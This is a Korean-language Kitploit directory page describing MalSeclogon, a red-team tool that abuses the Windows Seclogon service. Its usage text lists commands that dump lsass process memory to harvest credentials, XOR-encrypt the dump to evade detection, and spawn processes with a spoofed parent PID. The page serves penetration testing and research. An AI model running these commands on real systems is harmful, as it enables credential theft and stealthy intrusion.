Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
MalSeclogon — Seclogon 서비스를 가지고 놀 수 있는 작은 도구 | Kitploit
도구/GitHubGitHub/antoniococo/malseclogon
Privilege EscalationMemory ForensicsExploitationLateral MovementPost-ExploitationRed Teaming
GitHubantoniococo/malseclogon

MalSeclogon

Seclogon 서비스를 가지고 놀 수 있는 작은 도구

저장소 보기
327494년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

MalSeclogon

Seclogon 서비스를 가지고 놀 수 있는 작은 도구입니다.

전체 기술 세부 사항:

  • https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-2.html
  • https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html

사용법

root@kitploit:~
        MalSeclogon v0.2
        @splinter_code

Args:
-p Pid of the process to spoof the PPID through seclogon service
-d Dump lsass method
        1 = Dump lsass by using leaked handles
        2 = Dump lsass by using leaked handles and cloned lsass process
        3 = Dump lsass by stealing handle from seclogon. (Default)
-o Output path of the dump (default C:\lsass.dmp)
-c Commandline of the spoofed process, default: cmd.exe (not compatible with -d)
-k Xor key to encrypt the dump. Compatible only with -d 3. Allowed values 1-255. Default = 40.
-f Path to an encrypted dump file. This decrypt the dump. If no -k key are specified the default value is 40.

Examples:
- Run a process with a spoofed PPID:
        Malseclogon.exe -p [PPID] -c cmd.exe
- Dump lsass by using leaked handles:
        Malseclogon.exe -d 1
- Dump lsass by using leaked handles and cloned lsass process:
        Malseclogon.exe -d 2
- Dump lsass by stealing handle from seclogon using xor key 40:
        Malseclogon.exe -d 3 -o C:\lsass.dmp.xor -k 40
- Decrypt an lsass dmp file with the key 40:
        Malseclogon.exe -f C:\lsass.dmp.xor -k 40

빌드 지침

"Debug" 또는 "x86" 릴리스로 빌드하지 마세요. 이러한 빌드를 사용하면 컴파일된 바이너리가 작동하지 않습니다. 올바른 빌드는 "Release x64"입니다.

도구 다운로드